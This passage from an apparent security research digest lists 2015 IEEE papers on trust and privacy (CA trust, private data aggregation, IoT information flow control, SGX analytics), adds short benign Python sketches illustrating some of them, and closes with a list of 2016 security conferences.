trustworthy. Furthermore, it points out that the number of entities we trust with the security of our SSL communications keeps growing over time, illustrates the negative effects this might have, and shows that the trust model of SSL is fundamentally broken.

Keywords: certification; cryptographic protocols; data privacy; message authentication; online front-ends; operating systems (computers);trusted computing; CAs; SSL communications; SSL entity authentication; SSL root; SSL-enabled services; browsers; certification authorities; entity authentication mechanisms; online communications; operating systems; privacy; root certificate programs; security; trust model; Browsers; Companies; Government; Indexes; Internet; Operating systems; Security; CA; PKI; trust (ID#: 16-9439)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7299911&isnumber=7299862
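
A reader can reproduce a small slice of this analysis locally — enumerating the root CAs their own platform trusts — with nothing but the Python standard library. The output depends entirely on the local trust store, and the paper's cross-vendor correlation against trustworthiness indexes goes much further than this.

import ssl
from collections import Counter

# create_default_context() loads the platform's default CA certificates.
ctx = ssl.create_default_context()
roots = ctx.get_ca_certs()

# Tally the issuer country of each trusted root (field may be absent).
countries = Counter(
    dict(rdn[0] for rdn in cert["issuer"]).get("countryName", "?")
    for cert in roots)
print(len(roots), "trusted roots; top countries:", countries.most_common(5))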

 

Jingyao Fan, Qinghua Li and Guohong Cao, "Privacy-Aware and Trustworthy Data Aggregation in Mobile Sensing," Communications and Network Security (CNS), 2015 IEEE Conference on, Florence, 2015, pp. 31-39. doi: 10.1109/CNS.2015.7346807

Abstract: With the increasing capabilities of mobile devices such as smartphones and tablets, there are more and more mobile sensing applications such as air pollution monitoring and healthcare. These applications usually aggregate the data contributed by mobile users to infer about people's activities or surroundings. Mobile sensing can only work properly if the data provided by users is adequate and trustworthy. However, mobile users may not be willing to submit data due to privacy concerns, and they may be malicious and submit forged data to cause damage to the system. To address these problems, this paper proposes a novel privacy-aware and trustworthy data aggregation protocol for mobile sensing. Our protocol allows the server to aggregate the data submitted by mobile users without knowing the data of individual user. At the same time, if malicious users submit invalid data, they will be detected or the polluted aggregation result will be rejected by the server. In this way, the malicious users' effect on the aggregation result is effectively limited. The detection of invalid data works even if multiple malicious users collude. Security analysis shows that our scheme can achieve the trustworthy and privacy preserving goals, and experimental results show that our scheme has low computation cost and low power consumption.

Keywords: data privacy; mobile handsets; protocols; telecommunication security; trusted computing; invalid data detection; mobile device; mobile sensing; power consumption; privacy-aware data aggregation protocol; security analysis; trustworthy data aggregation protocol; Aggregates; Data privacy; Manganese; Mobile communication; Protocols; Sensors; Servers (ID#: 16-9440)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7346807&isnumber=7346791
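
One classic way to let a server aggregate without learning individual values is pairwise additive blinding, sketched below: users exchange random masks that cancel in the sum. This is only the aggregation idea; the paper's actual protocol additionally detects or rejects forged data from colluding malicious users, which this sketch does not attempt.

import random

P = 2**31 - 1  # arithmetic modulo a public prime

def blind(values):
    """Each pair of users (i, j) shares a random mask r added to i's value
    and subtracted from j's, so all masks cancel in the aggregate."""
    n = len(values)
    masks = [[0] * n for _ in range(n)]
    for i in range(n):
        for j in range(i + 1, n):
            r = random.randrange(P)
            masks[i][j], masks[j][i] = r, -r
    return [(v + sum(masks[i])) % P for i, v in enumerate(values)]

readings = [12, 7, 30, 5]                 # individual user data
blinded = blind(readings)                 # what the server receives
print("server sees:", blinded)
print("aggregate:", sum(blinded) % P, "== true sum", sum(readings))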

 

J. Singh, T. F. J. M. Pasquier and J. Bacon, "Securing Tags to Control Information Flows within the Internet of Things," Recent Advances in Internet of Things (RIoT), 2015 International Conference on, Singapore, 2015, pp. 1-6. doi: 10.1109/RIOT.2015.7104903

Abstract: To realise the full potential of the Internet of Things (IoT), IoT architectures are moving towards open and dynamic interoperability, as opposed to closed application silos. This is because functionality is realised through the interactions, i.e. the exchange of data, between a wide range of 'things'. Data sharing requires management. Towards this, we are exploring distributed, decentralised Information Flow Control (IFC) to enable controlled data flows, end-to-end, according to policy. In this paper we make the case for IFC, as a data-centric control mechanism, for securing IoT architectures. Previous research on IFC focuses on a particular system or application, e.g. within an operating system, with little concern for wide-scale, dynamic systems. To render IFC applicable to IoT, we present a certificate-based model for secure, trustworthy policy specification, that also reflects real-world IoT concerns such as 'thing' ownership. This approach enables decentralised, distributed, verifiable policy specification, crucial for securing the wide-ranging, dynamic interactions of future IoT applications.

Keywords: Internet of Things; telecommunication control; telecommunication security; Internet of Things; data-centric control mechanism; information flow control; IoT architectures; Production; Reliability; Certificates; Distributed Systems; Information Flow Control; Internet of Things; PKI; Privacy; Security (ID#: 16-9441)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7104903&isnumber=7104893
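
The tag-based flow check at the heart of decentralised IFC is compact enough to sketch: a flow is permitted only if the sink holds every secrecy tag on the data and the data carries every integrity tag the sink requires. The tag names below are invented; the paper's contribution is the certificate-based, verifiable specification of such policies at IoT scale, which this sketch does not cover.

def flow_allowed(data_secrecy, data_integrity, sink_secrecy, sink_integrity):
    """Classic IFC label check using set inclusion: secrecy must not leak,
    and the sink's integrity requirements must be met by the data."""
    return data_secrecy <= sink_secrecy and sink_integrity <= data_integrity

data = {"secrecy": {"patient-123"}, "integrity": {"certified-sensor"}}
cloud_app = {"secrecy": {"patient-123", "hospital"},
             "integrity": {"certified-sensor"}}
print(flow_allowed(data["secrecy"], data["integrity"],
                   cloud_app["secrecy"], cloud_app["integrity"]))  # True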

 

S. Chaudhary and R. Nath, "A New Template Protection Approach for Iris Recognition," Reliability, Infocom Technologies and Optimization (ICRITO) (Trends and Future Directions), 2015 4th International Conference on, Noida, 2015, pp. 1-6. doi: 10.1109/ICRITO.2015.7359306

Abstract: Biometric recognition systems, which rely on physical and behavioral features of the human body to recognize a human being, are used in various areas that require a high degree of security. Among the different biometric recognition methods, iris recognition is regarded as the most trustworthy, distinct, consistent, and stable option. Template security is an important aspect of a biometric system; it necessitates the development of an approach that ensures user security and privacy. In this paper, an approach based on steganography is proposed to protect the iris template. Random-number-based embedding is used in LSB (Least Significant Bit) steganography to enhance security. To provide more security, bits are embedded into the LSBs of blue pixels only. The IrisCode bits are embedded randomly across the three least significant bits. The resulting template is more secure, as the original biometric data is not stored in the database; rather, it is stored after embedding in a cover image. The performance of the proposed approach is evaluated and found to be better in terms of Peak Signal to Noise Ratio (PSNR) value, histogram plot and Receiver Operating Characteristic (ROC) curve plot.

Keywords: biometrics (access control); embedded systems; iris recognition; sensitivity analysis; steganography; LSB steganography; PSNR value; ROC curve; behavioral feature; biometric recognition system; iris recognition; least significant bit steganography; peak signal-to-noise ratio value; random number-based embedding; receiver operating characteristic curve; template protection approach; template security; Databases; Feature extraction; Image color analysis; Iris recognition; Security; Transforms; Hamming distance; Iris recognition; IrisCode; Least significant bit substitution; Receiver operating characteristic curve; Steganography (ID#: 16-9442)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7359306&isnumber=7359191
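
The embedding step the abstract describes — IrisCode bits hidden at random positions in the blue channel's least significant bits — can be sketched as follows. This is a single-LSB variant; the seed handling and the paper's three-bit layout are simplified assumptions.

import random
import numpy as np

def embed(cover_rgb, bits, seed):
    """Hide bits in the least significant bit of randomly chosen
    blue-channel pixels; the PRNG seed acts as the shared stego key."""
    stego = cover_rgb.copy()
    h, w, _ = stego.shape
    positions = list(range(h * w))
    random.Random(seed).shuffle(positions)        # key-driven pixel order
    for bit, pos in zip(bits, positions):
        y, x = divmod(pos, w)
        stego[y, x, 2] = (stego[y, x, 2] & 0xFE) | bit   # channel 2 = blue
    return stego

cover = np.random.randint(0, 256, size=(64, 64, 3), dtype=np.uint8)
iris_code = np.random.randint(0, 2, size=2048).tolist()
stego = embed(cover, iris_code, seed=42)
print("pixels changed:", int((stego != cover).sum()))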

 

S. Benabied, A. Zitouni and M. Djoudi, "A Cloud Security Framework Based on Trust Model and Mobile Agent," Cloud Technologies and Applications (CloudTech), 2015 International Conference on, Marrakech, 2015, pp. 1-8. doi: 10.1109/CloudTech.2015.7336962

Abstract: Cloud computing as a potential paradigm offers tremendous advantages to enterprises. With cloud computing, time to market is reduced, computing capability is augmented and computing power is practically limitless. Usually, to use the full power of cloud computing, cloud users have to rely on an external cloud service provider for managing their data. Nevertheless, the management of data and services may not be fully trustworthy. Hence, data owners are uncomfortable placing their sensitive data outside their own systems, i.e., in the cloud. Efforts to bring transparency, trustworthiness and security into the cloud model, in order to fulfill clients' requirements, are still ongoing. To achieve this goal, our paper introduces a two-level security framework: Cloud Service Provider (CSP) and Cloud Service User (CSU). Each level is responsible for a particular security task. The CSU level includes a proxy agent and a trust agent, dealing with the first verification. Then a second verification is performed at the CSP level. The framework incorporates a trust model to monitor users' behaviors. The use of mobile agents exploits their intrinsic features such as mobility, deliberate localization and secure communication channel provision. This model aims to protect users' sensitive information from other internal or external users and hackers. Moreover, it can detect policy breaches and notify users so that they can take the necessary actions when malicious access or malicious activity occurs.

Keywords: cloud computing; mobile agents; security of data; trusted computing; CSP; CSU; cloud computing; cloud security framework; cloud service provider; cloud service user; data management; mobile agent; policy breach detection; proxy agent; trust agent; trust model; two levels security framework; Cloud computing; Companies; Computational modeling; Mobile agents; Monitoring; Security; Servers; Cloud Computing Security; Cloud computing; Mobile Agent; Security and Privacy; Trust; Trust Model; cloud service provider (ID#: 16-9443)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7336962&isnumber=7336956

 

F. Akram and R. P. Rustagi, "An Efficient Approach Towards Privacy Preservation and Collusion Resistance Attendance System," MOOCs, Innovation and Technology in Education (MITE), 2015 IEEE 3rd International Conference on, Amritsar, 2015, pp. 41-45. doi: 10.1109/MITE.2015.7375285

Abstract: Every organization, whether an enterprise or an academic institute, should maintain proper documentation of the attendance of staff or students for its effective functioning. Generally there are two methods of taking attendance in a classroom: calling out students' names one by one, or taking students' signatures on paper. However, each of these strategies is time-consuming and inefficient; moreover, proxies can easily be given by students if the class is large, since it is not possible to verify each student in person. A good amount of time is wasted in taking attendance, and even then attendance is often not marked properly. Proxy attendance in the classroom is a perpetual problem that has to be addressed. Therefore, an attendance management system is required which not only authenticates the student but also detects proxies. In this paper we combine privacy preservation and collusion resistance to propose an attendance system which uses an Android application to mark students' attendance in the classroom and detect proxies given by students. It exploits Bluetooth technology to ensure the student is present in the class itself rather than in the canteen or the library. Based on the attendance given by students, a trust factor is assigned to each student to determine how trustworthy the student is.

Keywords: Bluetooth; data privacy; educational institutions; Bluetooth technology; android application; collusion resistance attendance management system; perpetual problem; privacy preservation; student attendance marking; student authentication; student proxy detection; student trustworthiness; trust factor; Bluetooth; Databases; Fingerprint recognition; Organizations; Privacy; Servers; Smart phones; Bluetooth Scanning; Collusion Avoidance; Privacy; Trust Factor (ID#: 16-9444)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7375285&isnumber=7375274

 

J. Classen, J. Braun, F. Volk, M. Hollick, J. Buchmann and M. Muhlhauser, "A Distributed Reputation System for Certification Authority Trust Management," Trustcom/BigDataSE/ISPA, 2015 IEEE, Helsinki, 2015, pp. 1349-1356. doi: 10.1109/Trustcom.2015.529

Abstract: In the current Web Public Key Infrastructure (Web PKI), a few central instances have the power to make trust decisions. From a system's perspective, this has the side effect that every Certification Authority (CA) becomes a single point of failure (SPOF). In addition, trust is not an individual matter per user, which makes trust decisions hard to revise. Hence, we propose a method to leverage Internet users and thus distribute CA trust decisions. However, the average user is unable to manually decide which incoming TLS connections are trustworthy and which are not. Therefore, we overcome this issue with a distributed reputation system that facilitates sharing trust opinions while preserving user privacy. We assess our methodology using real-world browsing histories. Our results exhibit a significant attack-surface reduction with respect to the current Web PKI, while introducing only minimal overhead.

Keywords: Internet; data privacy; decision making; public key cryptography; trusted computing; CA trust decision; Internet users; SPOF; TLS connections; Web PKI; Web public key infrastructure; attack surface reduction; certification authority trust management; distributed reputation system; single point of failure; trust decision making; trust opinion sharing; user privacy preservation; History; Internet; Peer-to-peer computing; Privacy; Protocols; Routing; Security; Web PKI; distributed system; trust management (ID#: 16-9445)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7345437&isnumber=7345233

 

C. L. Claiborne, C. Ncube and R. Dantu, "Random Anonymization of Mobile Sensor Data: Modified Android Framework," Intelligence and Security Informatics (ISI), 2015 IEEE International Conference on, Baltimore, MD, 2015, pp. 182-184. doi: 10.1109/ISI.2015.7165968

Abstract: With the increasing ability to accurately classify activities of mobile users from what was once viewed as innocuous mobile sensor data, the risk of users compromising their privacy has risen exponentially. Currently, mobile owners cannot control how various applications handle the privacy of their sensor data, or even determine if a service provider is adversarial or trustworthy. To address these privacy concerns, third party applications have been designed to allow mobile users to have control over the data that is sent to service providers. However, these applications require users to set flags and parameters that place restrictions on the anonymized or real sensor data that is sent to the requestor. Therefore, in this paper, we introduce a new framework, RANDSOM, that moves the decision-making from the application level to the operating system level.

Keywords: data privacy; mobile computing; smart phones; telecommunication security; RANDSOM framework; application level; mobile sensor data; mobile users; modified Android framework; operating system level; privacy concerns; random anonymization; sensor data privacy; service providers; third party applications; Accelerometers; Data models; Data privacy; Hidden Markov models; Mobile communication; Privacy; Smart phones; Android; RANDSOM; anonymized; pervasive; privacy; provider; smart phone (ID#: 16-9446)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7165968&isnumber=7165923
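
The operating-system-level idea behind RANDSOM can be reduced to its numeric core: perturb raw sensor readings with random noise before any application sees them. The noise model and scale below are assumptions for illustration, not the framework's actual parameters, and the real system makes this decision inside the Android framework rather than in application code.

import random

def anonymize(samples, scale=0.3):
    """Return accelerometer-like (x, y, z) samples perturbed with additive
    Gaussian noise so fine-grained activity patterns are harder to classify."""
    return [[v + random.gauss(0, scale) for v in s] for s in samples]

raw = [[0.1, 9.8, 0.0], [0.3, 9.7, 0.1]]   # what the sensor measured
print(anonymize(raw))                       # what an untrusted app would see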

 

K. Thakker, Chung-Horng Lung and P. Morde, "Secure and Optimal Content-centric Networking Caching Design," Trustworthy Systems and Their Applications (TSA), 2015 Second International Conference on, Hualien, 2015, pp. 36-43. doi: 10.1109/TSA.2015.17

Abstract: The increasing demand for content, and the size of contents, make today's Internet architecture inefficient. This host-centric model does not seem effective in catering to current communication needs, where users focus on desired content. As a result, a translation between content information and the networking domain must take place, typically consisting of the establishment of a delivery path between the content provider and the content consumer. This translation is generally an inefficient constraint, as data location and data popularity are neglected, which leads to overconsumption of network resources. The increasing demand for highly scalable and efficient distribution of content has motivated the development of a future Internet architecture based on named data objects. Currently, Content-Centric Networking (CCN) is gaining attention as the future Internet architecture, where contents themselves are the primary focus rather than the location of the content. This paper provides insight into the cache management policies currently used for large-file caching, and presents our proposed approach, along with the justification and validation behind it, for designing the best caching strategy in CCN. However, caching policies can be misused if attackers use the cache as storage to make their own content available for attacks or privacy leaks. We conclude with the need for security mechanisms to protect the cache and measures to prevent any misuse of it.

Keywords: Internet; cache storage; data privacy; security of data; CCN; Internet architecture; host centric model; named data objects; network resource over-consumption; optimal content-centric networking caching design; privacy leaks; secure content-centric networking caching design; Computer architecture; Computers; Internet; Mathematical model; Privacy; Routing protocols; Security; Content delivery networking (CDN); Content-centric networking (CCN); caching; peer-assisted content delivery; software defined networking (SDN) (ID#: 16-9447)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7335942&isnumber=7335925

 

J. Bushey, "Trustworthy Citizen-Generated Images and Video on Social Media Platforms," System Sciences (HICSS), 2015 48th Hawaii International Conference on, Kauai, HI, 2015, pp. 1553-1564. doi: 10.1109/HICSS.2015.189

Abstract: The convergence of digital cameras into mobile phones with Internet connectivity and the proliferation of social media platforms for accessing, sharing, managing and storing digital images and videos has transformed news reportage and provided the opportunity for citizen journalists to capture and disseminate visual documentation, which shapes contemporary events, informs future decisions and over time, becomes part of the historical record and societal memory. Or does it? What are the obstacles to ongoing access and long-term preservation of citizen-generated content in social media platforms? This paper provides a multidisciplinary approach to exploring the trustworthiness of online content, utilizing literature from the fields of journalism and the law, as well as findings from archival studies on record-making and recordkeeping in the digital environment. Recommendations to citizen journalists are provided to assist in the capture and storage of trustworthy digital images in social media platforms.

Keywords: Internet; cameras; mobile handsets; social networking (online);trusted computing; Internet connectivity; digital cameras; mobile phones; social media platforms; trustworthy citizen-generated images; trustworthy citizen-generated video; visual documentation; Digital images; Law; Media; Privacy; Reliability; Visualization; Authenticity; Citizen Journalism; Digital Images; Legal Evidence; Social Media; Trustworthiness (ID#: 16-9448)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7069999&isnumber=7069647

 

M. Javanmard, M. A. Salehi and S. Zonouz, "TSC: Trustworthy and Scalable Cytometry," High Performance Computing and Communications (HPCC), 2015 IEEE 7th International Symposium on Cyberspace Safety and Security (CSS), 2015 IEEE 12th International Conference on Embedded Software and Systems (ICESS), 2015 IEEE 17th International Conference on, New York, NY, 2015, pp. 1356-1360. doi: 10.1109/HPCC-CSS-ICESS.2015.125

Abstract: Accurate flow cytometry analyses for disease diagnosis require powerful computational and storage resources that are rarely available in clinical settings. Emerging high-performance cloud computing technologies could potentially address this scalability challenge; however, potentially untrusted cloud infrastructures significantly increase security and privacy concerns, as attackers may gain knowledge about patient identity and medical information and affect the consequent course of treatment. In this paper, we present TSC, a trustworthy, scalable cloud-based solution that provides remote cytometry analysis capabilities. TSC enables medical laboratories to upload acquired high-frequency raw measurements to the cloud for remote cytometry analysis with high-confidence data security guarantees. In particular, using fundamental cryptographic security solutions, such as the trusted platform module framework, TSC eliminates any possibility of unauthorized exfiltration of sensitive patient data to untrusted parties, e.g., malicious or compromised cloud providers. Our evaluation results show that TSC effectively facilitates scalable and efficient disease diagnoses while preserving patient privacy and treatment correctness.

Keywords: cloud computing; cryptography; data privacy; diseases; medical information systems; patient diagnosis; patient treatment; trusted computing; TSC; computational resources; disease diagnosis; flow cytometry analysis; fundamental cryptographic security solutions; high-confidence data security; high-frequency raw measurements; high-performance cloud computing technologies; medical information; patient privacy; patient treatment correctness; remote cytometry analysis; remote cytometry analysis capabilities; scalability challenge; storage resources; trusted platform module framework; trustworthy scalable cloud-based solution; unauthorized sensitive patient data exfiltration; untrusted cloud infrastructures; untrusted parties; Cloud computing; Cryptography; Diseases; Electrodes; Proteins; Sensors; Cloud computing; Cytometry; Security; Trusted Platform Module (TPM) (ID#: 16-9449)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7336356&isnumber=7336120
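
TSC's guarantees rest on the trusted platform module framework, and its actual protocol is not reproduced here. As a loose, hypothetical sketch of the underlying principle (sensitive measurements are sealed before they leave the laboratory, so an untrusted cloud provider only ever handles ciphertext), the following uses AES-GCM from the widely available cryptography package; the function names, and the assumption that the laboratory holds the key, belong to this example rather than to the paper.

# pip install cryptography
import os
from cryptography.hazmat.primitives.ciphers.aead import AESGCM

def seal_measurements(raw_bytes, key):
    """Encrypt raw cytometry measurements client-side; only the
    ciphertext (nonce + sealed data) is uploaded to the cloud."""
    nonce = os.urandom(12)  # 96-bit nonce, unique per message
    return nonce + AESGCM(key).encrypt(nonce, raw_bytes, None)

def unseal_measurements(blob, key):
    """Recover plaintext; intended to run only inside a trusted
    environment such as the laboratory or an attested analysis node."""
    nonce, ciphertext = blob[:12], blob[12:]
    return AESGCM(key).decrypt(nonce, ciphertext, None)

key = AESGCM.generate_key(bit_length=256)  # held by the laboratory
sealed = seal_measurements(b"raw high-frequency samples", key)
assert unseal_measurements(sealed, key) == b"raw high-frequency samples"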

 

F. Schuster et al., "VC3: Trustworthy Data Analytics in the Cloud Using SGX," Security and Privacy (SP), 2015 IEEE Symposium on, San Jose, CA, 2015, pp. 38-54. doi: 10.1109/SP.2015.10

Abstract: We present VC3, the first system that allows users to run distributed MapReduce computations in the cloud while keeping their code and data secret, and ensuring the correctness and completeness of their results. VC3 runs on unmodified Hadoop, but crucially keeps Hadoop, the operating system, and the hypervisor out of the TCB; thus, confidentiality and integrity are preserved even if these large components are compromised. VC3 relies on SGX processors to isolate memory regions on individual computers, and to deploy new protocols that secure distributed MapReduce computations. VC3 optionally enforces region self-integrity invariants for all MapReduce code running within isolated regions, to prevent attacks due to unsafe memory reads and writes. Experimental results on common benchmarks show that VC3 performs well compared with unprotected Hadoop: VC3's average runtime overhead is negligible for its base security guarantees, 4.5% with write integrity and 8% with read/write integrity.

Keywords: cloud computing; data analysis; data integrity; trusted computing; SGX; TCB; VC3; average runtime overhead; base security guarantees; cloud; hypervisor; memory regions; read-write integrity; region self-integrity invariants; secure distributed MapReduce computations; trustworthy data analytics; unmodified Hadoop; Encryption; Operating systems; Program processors; Protocols; Virtual machine monitors (ID#: 16-9450)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7163017&isnumber=7163005
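
VC3's contribution is keeping MapReduce jobs confidential inside SGX enclaves; the enclave key-exchange and job-verification protocols are specific to the paper and are not sketched here. For readers unfamiliar with the computation model being protected, here is a plain, single-process word count in the MapReduce style; under VC3, the equivalent map and reduce code and its data would run inside isolated memory regions that Hadoop, the OS, and the hypervisor cannot read.

from collections import defaultdict

def map_phase(document):
    """Map: emit (word, 1) pairs, as a Hadoop mapper would."""
    for word in document.split():
        yield word.lower(), 1

def reduce_phase(pairs):
    """Reduce: sum the counts per key after the shuffle step."""
    counts = defaultdict(int)
    for word, count in pairs:
        counts[word] += count
    return dict(counts)

docs = ["secure MapReduce in the cloud", "the cloud runs MapReduce"]
pairs = [kv for doc in docs for kv in map_phase(doc)]
print(reduce_phase(pairs))  # e.g., {'mapreduce': 2, 'the': 2, ...}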


Note:

Articles listed on these pages have been found on publicly available internet pages and are cited with links to those pages. Some of the information included herein has been reprinted with permission from the authors or data repositories. Direct any requests via Email to news@scienceofsecurity.net for removal of the links or modifications to specific citations. Please include the ID# of the specific citation in your correspondence.

Upcoming Events of Interest

SoS Logo

Upcoming Events of Interest

Mark your calendars!

This section features a wide variety of upcoming security-related conferences, workshops, symposiums, competitions, and events happening in the United States and the world. This list also includes several past events with links to proceedings or summaries of the actual activities.

Note: The events may also be found on the SoS Calendar, located by clicking the 'Calendar' tab on the left-hand navigation bar.


escar USA 2016
The overall goal and objective of the escar USA workshop is to provide a forum to encourage collaboration among private industry (e.g., OEMs, suppliers, vendors), academia, and government (e.g., DOT, NHTSA, DoD, DHS, European Commission) regarding modern in-vehicle Cyber Security threats, vulnerabilities, and risk mitigation/countermeasures. In addition to Cyber Security, escar also addresses other automotive security issues such as electronic theft protection and new digital business models. This workshop will create the opportunity for information exchange, networking, and collaboration among your peers, and a setting in which to define research needs. The workshop will also offer networking opportunities for (future) attendees in relevant government initiatives.
Date: June 1 - 2
Location: Detroit, MI
URL: https://www.escar.info/escar-usa.html

Techno Security & Forensics Investigation Conference
The Eighteenth Annual International Techno Security & Forensics Investigations Conference will be held June 5 - June 8 in sunny Myrtle Beach at the Myrtle Beach Marriott Resort. This conference promises to be the international meeting place for IT Security professionals from around the world. The conference will feature some of the top speakers in the industry and will raise international awareness of the need for increased education and ethics in IT security.
Date: June 5 - 8
Location: Myrtle Beach, SC
URL: http://www.technosecurity.us/Content/Welcome

Infosecurity Europe
Infosecurity Europe is the founding brand of Infosecurity Group - a business unit of Reed Exhibitions UK Ltd. It is Europe's number one information security event, featuring the largest and most comprehensive education programme, and over 315 exhibitors showcasing the most diverse range of products and services to 12,000 visitors.
Date: June 7 - 9
Location: London, UK
URL: http://www.infosecurityeurope.com/

AFCEA Homeland Security Conference 2016
The AFCEA Homeland Security Conference is your chance to bring your products and solutions right to decision-makers within the homeland security community. The 2016 event will offer enhanced opportunities for networking between business and government, such as lunches held in the exhibit area each day, as well as an impressive program of keynote speakers, panelists and sessions.
Date: June 21 - 22
Location: Washington D.C.
URL: http://events.afcea.org//homeland16/Public/enter.aspx

Security of Things World
Exploring Security and the Internet of Things. A world-class event focused on the next information security revolution. Be part of Security of Things World in June in Berlin to tailor your proposition to respond to the security concerns that preoccupy enterprise customers today and find pragmatic solutions to the most common security threats.
Date: June 27 - 28
Location: Berlin, Germany
URL: http://securityofthingsworld.com/en/


Appsec Europe 2016
OWASP is a nonprofit community organization with 200 chapters in over 100 countries around the world. Our mission is to make software security visible, so that individuals and organizations worldwide can make informed decisions about true software security risks. Our wiki has a wealth of security knowledge and we are well known for many of our influential security projects. The OWASP AppSec conferences represent our largest outreach efforts to advance our mission of spreading security knowledge. These events help fund the non-profit organization and provide a great learning experience for everyone involved. Many thanks to our conference sponsors, OWASP foundation sponsors, and most importantly the OWASP community!
Date: June 27 - July 1
Location: Rome, Italy
URL: http://2016.appsec.eu/

European Conference on Cyber Warfare and Security
It is now 15 years since the European Conference on Cyber Warfare and Security (ECCWS) was established. It has been held in Finland, Estonia, Greece, Portugal, England, and The Netherlands, to mention only a few of the countries that have hosted it. The conference attracts an interesting combination of academic scholars, military personnel, practitioners and individuals who are engaged in various aspects of the cyber security community. ECCWS is generally attended by participants from more than 30 countries. The Journal of Information Warfare regularly publishes a number of the papers presented at this conference.
Date: July 7 - 8
Location: Munich, Germany
URL: http://www.academic-conferences.org/conferences/eccws/

International Symposium on Human Aspects of Information Security & Assurance (HAISA 2016)
We invite you to participate in the International Symposium on Human Aspects of Information Security & Assurance (HAISA 2016). The event will be held 19-21 July 2016 in the city of Frankfurt, Germany, in association with the Eleventh International Network Conference (INC2016). This symposium, the tenth in our series, will bring together leading figures from academia and industry to present and discuss the latest advances in information security from research and commercial perspectives.
Date: July 19 - 21
Location: Frankfurt, Germany
URL: http://www.haisa.org/

AFCEA Classified Cyber Forum 2016
The AFCEA Classified Cyber Forum is a one-day event focusing on the substantial threats that sophisticated adversaries pose to government and industry computer networks and data, threats that require the U.S. government to leverage private-sector resources and capabilities. The agenda will explore the challenges in accomplishing this goal and highlight where public-private sector cooperation is most needed.
Date: July 21
Location: Chantilly, VA
URL: http://www.afcea.org/event/?q=CyberForum2016

Billington Global Automotive Cybersecurity Summit
The centerpiece of this day-long summit will be the keynote addresses by U.S. Secretary of Transportation Anthony Foxx, the country's top transportation official, and GM Chairman and CEO Mary Barra, the chief of the country's largest automaker. The automotive sector is taking some steps to bolster cybersecurity awareness and knowledge. Last year the industry created the Automotive Information Sharing and Analysis Center ("Auto-ISAC") to enhance information sharing in the auto sector. In addition, companies are forming "coordinated disclosure programs," which allow security researchers to share cyber threats with the OEMs (Original Equipment Manufacturers).
Date: July 22
Location: Detroit, MI
URL: http://www.billingtoncybersecurity.com/global-automotive-cybersecurity-summit/

Black Hat USA
Black Hat is the most technical and relevant global information security event series in the world. For more than 16 years, Black Hat has provided attendees with the very latest in information security research, development, and trends in a strictly vendor-neutral environment. These high-profile global events and Trainings are driven by the needs of the security community, striving to bring together the best minds in the industry. Black Hat inspires professionals at all career levels, encouraging growth and collaboration among academia, world-class researchers, and leaders in the public and private sectors. From its inception in 1997, Black Hat has grown from a single annual conference in Las Vegas to the most respected information security event series internationally. Today, the Black Hat Briefings and Trainings are held annually in the United States, Europe and Asia, providing a premier venue for elite security researchers and trainers to find their audience.
Date: July 30 - August 4
Location: Las Vegas, NV
URL: https://www.blackhat.com/us-16/

TechNet Augusta 2016
TechNet Augusta provides a forum for key military professionals from the U.S. Defense Department, armed services and U.S. Coast Guard to discuss issues and share ideas. Government, industry and academic speakers address a range of topics and focus on the importance of the network, security issues and training to enable operational forces to modernize and be ready to meet emerging challenges in 2025 and beyond.
Date: August 2 - 4
Location: Augusta, GA
URL: http://events.afcea.org/Augusta16/Public/Enter.aspx

USENIX Security 2016
The USENIX Security Symposium brings together researchers, practitioners, system administrators, system programmers, and others interested in the latest advances in the security and privacy of computer systems and networks. The 25th USENIX Security Symposium will be held August 10-12, 2016, in Austin, TX.
Date: August 10 - 12
Location: Austin, TX
URL: https://www.usenix.org/conference/usenixsecurity16

Intelligence and National Security Summit 2016
Hosted by the two leading professional associations - AFCEA International (AFCEA) and the Intelligence and National Security Alliance (INSA) - this is the premier gathering of senior decision makers from government, military, industry and academia. In its first two years the summit drew more than 3,000 attendees, exhibitors and journalists. This two-day, unclassified summit boasts an impressive agenda again in 2016 with top federal agency leaders and policymakers sharing their assessments and priorities for U.S. intelligence over five plenary sessions. In addition, nine breakout sessions divided into three tracks - Cyber, Policy, and Enduring Issues - will allow for additional emphasis and discussion of contemporary challenges and opportunities. The Summit's collection of influential speakers and attendees makes this one event intelligence- and cyber-related companies cannot afford to miss as an attendee, exhibitor, or sponsor.
Date: September 7 - 8
Location: Washington D.C.
URL: http://events.jspargo.com/inss16/public/enter.aspx

Rock Stars of Cybersecurity/Threats and Counter Measures
What Do Google, Adobe, Intel Health and Life Sciences, and PayPal Know About Cybersecurity That You Need to Know? Lots! The attackers have gotten more sophisticated. No company or person is safe. The only way to protect your organization and your personal data in 2016 is with a strong Cybersecurity solution. At Rock Stars of Risk-based Security, we've brought together the real leaders in this critical technology - Google, Adobe, PayPal, Intel Health and Life Sciences, and others - to talk about the trends, cybersecurity programs and advice on how you can develop real-world security solutions that work for your organization - and that don't disrupt your operations.
Date: September 13
Location: Seattle, WA
URL: https://www.computer.org/web/rock-stars/cybersec-seattle#fans

Global Identity Summit 2016
The Global Identity Summit provides an immersive environment where identity professionals from the federal government, private sector, and academia can dedicate three continuous days to strategic planning, information sharing, needs analysis, collaboration, and relationship building. GIS venues are chosen to support this environment (rather than drive-by participation), and enable concurrent presentation tracks, workshops, exhibition space, dining, and private events.
Date: September 19 - 22
Location: Tampa, FL
URL: http://events.afcea.org/GlobalID16/Public/enter.aspx

IEEE Intelligence and Security Informatics (ISI) 2016
